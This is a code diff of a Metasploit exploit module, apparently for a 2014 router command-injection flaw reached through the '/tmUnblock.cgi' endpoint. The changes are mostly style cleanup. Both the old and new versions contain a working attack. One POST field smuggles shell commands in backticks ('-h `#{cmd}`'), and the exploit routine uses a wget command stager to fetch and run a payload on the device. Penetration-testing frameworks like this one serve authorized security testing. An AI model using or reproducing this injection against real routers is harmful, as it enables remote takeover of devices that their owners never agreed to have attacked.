@@ -41,7 +41,6 @@ class MetasploitModule < Msf::Exploit::Remote
         ],
         'DisclosureDate' => '2014-02-13',
         'Privileged' => true,
-        'Platform' => %w{linux unix},
         'Payload' => {
           'DisableNops' => true
         },
@@ -73,27 +72,25 @@ class MetasploitModule < Msf::Exploit::Remote
     deregister_options('CMDSTAGER::DECODER', 'CMDSTAGER::FLAVOR')
   end
 
-  def execute_command(cmd, opts)
-    begin
-      res = send_request_cgi({
-        'uri' => '/tmUnblock.cgi',
-        'method' => 'POST',
-        'encode_params' => true,
-        'vars_post' => {
-          "submit_button" => "",
-          "change_action" => "",
-          "action" => "",
-          "commit" => "0",
-          "ttcp_num" => "2",
-          "ttcp_size" => "2",
-          "ttcp_ip" => "-h `#{cmd}`",
-          "StartEPI" => "1"
-        }
-      }, 2)
-      return res
-    rescue ::Rex::ConnectionError
-      fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server")
-    end
+  def execute_command(cmd, _opts)
+    res = send_request_cgi({
+      'uri' => '/tmUnblock.cgi',
+      'method' => 'POST',
+      'encode_params' => true,
+      'vars_post' => {
+        'submit_button' => '',
+        'change_action' => '',
+        'action' => '',
+        'commit' => '0',
+        'ttcp_num' => '2',
+        'ttcp_size' => '2',
+        'ttcp_ip' => "-h `#{cmd}`",
+        'StartEPI' => '1'
+      }
+    }, 2)
+    return res
+  rescue ::Rex::ConnectionError
+    fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server")
   end
 
   def check
@@ -114,13 +111,13 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def exploit
-    print_status("Trying to access the vulnerable URL...")
+    print_status('Trying to access the vulnerable URL...')
 
     unless check == Exploit::CheckCode::Detected
       fail_with(Failure::Unknown, "#{peer} - Failed to access the vulnerable URL")
     end
 
-    print_status("Exploiting...")
-    execute_cmdstager({ :flavor => :wget })
+    print_status('Exploiting...')
+    execute_cmdstager({ flavor: :wget })
   end
 end
